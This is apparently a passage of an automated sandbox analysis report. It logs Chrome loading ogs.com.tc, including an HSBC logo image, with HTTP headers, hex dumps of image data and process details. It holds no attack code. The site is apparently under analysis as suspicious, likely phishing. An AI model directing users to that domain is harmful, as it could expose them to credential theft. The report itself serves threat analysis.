    Data Ascii: sm^*'+b<NU}6v,^o8q@q] ,^Hz~& :d gXB2`&P#aBV9j9:bh!6;=x6B+~tM|E*kEZ,502T|G1/~oU;;#GLF#d$6rH^E]x/Gb!/z( uO{t<I!_2}


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    51192.168.2.549772185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:14 UTC362OUTGET /assets/images/banks/hsbc.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:15 UTC284INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:14 GMT
    Content-Type: image/jpeg
    Content-Length: 33055
    Last-Modified: Thu, 23 May 2024 21:37:15 GMT
    Connection: close
    ETag: "664fb70b-811f"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:15 UTC16100INData Raw: ff d8 ff e1 0b 10 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 39 3a 32 38 20 30 31 3a 35 36 3a 30 32 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
    Data Ascii: ExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:09:28 01:56:02"
    2024-05-25 22:18:15 UTC16384INData Raw: 82 bd f1 2a e5 65 99 fb 3f b7 25 24 8e 17 68 7c 43 ac 61 6a 54 df c5 cd 9a 57 18 f2 b8 90 2c ed 79 60 64 9b cf 1c 9a 2e 99 cb 1e ea 07 33 23 08 c4 7a b0 07 01 24 ce 61 bd a1 e0 ed 9d 09 f1 94 44 ec 1d 5a 07 96 88 98 38 60 07 19 74 7a f3 96 d9 69 0b 60 80 e7 c7 c6 8a 99 a7 04 3d cc 19 1b 23 24 17 28 1c 36 1c cb 74 97 de 7c 92 94 a5 43 5c 14 38 ab 8a d4 ee 3d 13 9e 09 20 83 b6 3f 29 ea 34 77 40 7b 09 8c 15 cb 25 17 69 7c 4d 2a 0a 0b 13 63 88 74 76 37 45 a5 0e 47 5c 6a 70 bf 6c e4 8a e5 56 f6 29 b2 55 8c d0 dd 18 94 1c c6 84 76 5c f0 fa 76 ec c7 5c 88 38 bf f8 f9 87 bc 52 6d 01 87 6a 6d 76 bf 01 d1 22 d1 2f be 5e 5e 5e 5e 58 7c 71 78 c5 24 6a c0 a1 6c a1 60 57 bb aa 3f b2 fa 35 42 af 0d 55 99 b5 a6 40 9c 7f 80 a2 27 60 ea d0 3c b3 c4 c1 c3 00 38 c7 47 af 29
    Data Ascii: *e?%$h|CajTW,y`d.3#z$aDZ8`tzi`=#$(6t|C\8= ?)4w@{%i|M*ctv7EG\jplV)Uv\v\8Rmjmv"/^^^^X|qx$jl`W?5BU@'`<8G)
    2024-05-25 22:18:15 UTC571INData Raw: b7 ab 98 d4 42 80 e2 55 6b c6 41 bd ad 20 4c 37 30 d1 cc c6 14 4f 61 18 d7 22 ee b0 a3 b6 d9 f6 b3 b6 ba 70 71 bb 03 31 d2 ed 30 36 b2 dc 43 87 8f b7 e6 08 da c6 4e 10 d8 e4 ad b2 56 b0 36 80 1a ff 00 42 43 0a 24 26 1b 0c 5a 8d a7 74 db 5a 82 17 1b 8d 33 db 2e b3 05 59 2d a4 08 79 07 90 00 12 34 82 80 22 35 cb 5b 5c ae 61 ed 4e c5 fe 84 76 14 ad d4 72 5f 25 ea 2d f6 9b cd a5 bc ab dd 46 a2 f6 53 a5 da 5b da 4b 72 29 0e 72 2a 35 82 10 d8 d6 8c 21 1b 58 08 e0 63 04 26 30 6c 6b 53 f0 55 bc 11 ce d6 56 ba 4e d5 34 b6 aa 91 65 2a 49 b3 b8 e0 eb 9b 49 2a f9 3a 3c e4 66 21 a5 4d c4 4e 94 65 2d bd 40 91 cf 1b dc f9 b0 98 b2 3e 22 3c ee c2 72 fc 03 5c fe 5a ba e5 be 32 d6 af 1c 83 12 68 d7 51 b5 91 6e f4 34 53 eb ad 2a ec 63 19 d5 ce a4 7d 6b be 2c 93 9e 56 43 04
    Data Ascii: BUkA L70Oa"pq106CNV6BC$&ZtZ3.Y-y4"5[\aNvr_%-FS[Kr)r*5!Xc&0lkSUVN4e*II*:<f!MNe-@>"<r\Z2hQn4S*c}k,VC


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    52192.168.2.549773185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:15 UTC367OUTGET /assets/images/favicon-196x196.png HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:16 UTC283INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:15 GMT
    Content-Type: image/png
    Content-Length: 38550
    Last-Modified: Thu, 23 May 2024 21:37:22 GMT
    Connection: close
    ETag: "664fb712-9696"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:16 UTC16101INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c4 00 00 00 c4 08 06 00 00 01 b7 a1 be fd 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 80 00 49 44 41 54 78 da e5 fd 79 78 14 c5 f6 07 8c 7f ba 67 b2 10 42 08 01 42 24 61 4d 58 05 0c 88 08 08 08 a8 08 88 0a a2 88 5c 11 54 10 dc 70 bd 82 fb 2e d7 eb c5 1d 37 40 14 14 ae 0b 2a a2 41 44 04 54 04 54 f6 7d df d7 24 93 64 32 99 bd eb fc fe e8 65 aa 7b ba 7b 7a 82 f7 fb fe de e7 ad e7 99 64 a6 bb d6 b3 d5 a9 53 a7 4e 01 00 18 63 22 00 10 91 08 2e a9 cf f9 df c6 67 56 49 57 97 d3 8a f8 67 6a 1e e3 33 cb 46 6c 7b 60
    Data Ascii: PNGIHDRgAMAa cHRMz&u0`:pQ<bKGDIDATxyxgBB$aMX\Tp.7@*ADTT}$d2e{{zdSNc".gVIWgj3Fl{`
    2024-05-25 22:18:16 UTC16384INData Raw: 0f 95 83 af 05 3b 7a 0c aa 6d 3c a5 67 0f d4 fb ef 3c 08 8a af c0 d9 b3 67 8f 9e 7f fe f9 23 cb cb cb 8f 23 b6 c9 15 35 69 df f8 df bc 7f 05 05 05 19 9a ea c5 d9 5a b4 8f 72 cd 8d e2 71 51 8a f8 cb b2 75 22 e3 fc f3 cf 6f a4 e9 eb fb f6 eb b4 ae d8 8a bc 50 d3 9c 2a 7a 0f d0 28 ac 4f 9f 3e d7 43 ef 66 62 ea 2c 60 18 0c 60 2f 8a cc be 03 00 3e fb ec b3 1e 44 14 e1 65 7d 70 e1 e7 71 9a 62 60 ee 7c 9d d9 7b f1 e2 c5 8b 10 bb b3 34 99 7b b6 ad 53 65 65 e5 67 da 04 7d e9 20 83 29 b7 90 c2 eb ff d4 3a d0 ae 5d bb fe 88 17 1b 46 db 94 36 e1 7b 3a 5f c4 5d 9f 5c a8 af 5b 99 7f 7c dc 6a b4 43 87 0e ed 61 bd 60 73 22 67 ed bc 3e b4 74 f7 dd 77 77 63 8c 9d e0 11 20 95 7b a8 a2 f7 00 dd 5c 50 de ae 8b 76 6b bb 0a 83 67 9e 79 e6 31 24 be 36 d9 91 f7 09 54 40 36 6b d6
    Data Ascii: ;zm<g<g##5iZrqQu"oP*z(O>Cfb,``/>De}pqb`|{4{Seeg} ):]F6{:_]\[|jCa`s"g>twwc {\Pvkgy1$6T@6k
    2024-05-25 22:18:16 UTC6065INData Raw: cd 16 c2 d8 b1 63 8b e7 cd 9b b7 08 b2 c9 4b 06 a8 cf 87 9a 47 9f 42 e8 9b 6f 65 9d 91 27 06 e5 40 39 00 08 39 d9 c8 7c 73 06 dc 97 f6 d5 21 e9 fb ef bf 9f 37 66 cc 98 e7 39 6b 92 91 19 78 e0 d8 01 05 00 70 f2 e4 c9 fb cf 3b ef bc d7 74 c8 f8 7c 11 6a 1e 7e 54 3b bf 9c 4c e2 2e 6f e5 1f 9a 32 05 44 11 ae 8e 1d 50 f7 a5 67 e5 9b 6a 14 09 69 a6 83 1b 67 25 cb f6 13 bc 77 92 47 63 08 89 01 a1 20 d8 a9 d3 88 ac 59 8b c8 ea 5f 11 dd b6 03 54 56 2e 5f 05 a6 8c 45 8b 99 04 fd cc 08 00 70 bb 21 b6 68 86 f4 db c6 23 75 f0 15 10 1a 35 34 8d 82 c1 18 63 e5 e5 e5 a7 67 cf 9e 3d 7b e6 cc 99 2b 4e 9c 38 51 06 fb eb 00 ec f0 6c 7c e6 c4 1a 64 cc 07 93 32 76 79 60 d1 9e f6 dc 3d 6f de bc 3b c1 31 03 00 84 16 7f 87 f0 d2 1f b5 08 0b 82 2e fa 94 c2 14 82 88 b4 f1 63 91 d2
    Data Ascii: cKGBoe'@99|s!7f9kxp;t|j~T;L.o2DPgjig%wGc Y_TV._Ep!h#u54cg={+N8Ql|d2vy`=o;1.c


    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    Behavior

    Click to jump to process

    System Behavior

    General

    Target ID:0
    Start time:18:17:59
    Start date:25/05/2024
    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Imagebase:0x7ff715980000
    File size:3'242'272 bytes
    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:false

    General

    Target ID:2
    Start time:18:18:03
    Start date:25/05/2024
    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2252,i,3500489096609477459,16314723359328106391,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Imagebase:0x7ff715980000
    File size:3'242'272 bytes
    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:false

    General

    Target ID:3
    Start time:18:18:05
    Start date:25/05/2024
    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ogs.com.tc/"
    Imagebase:0x7ff715980000
    File size:3'242'272 bytes
    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:true

    Disassembly

    No disassembly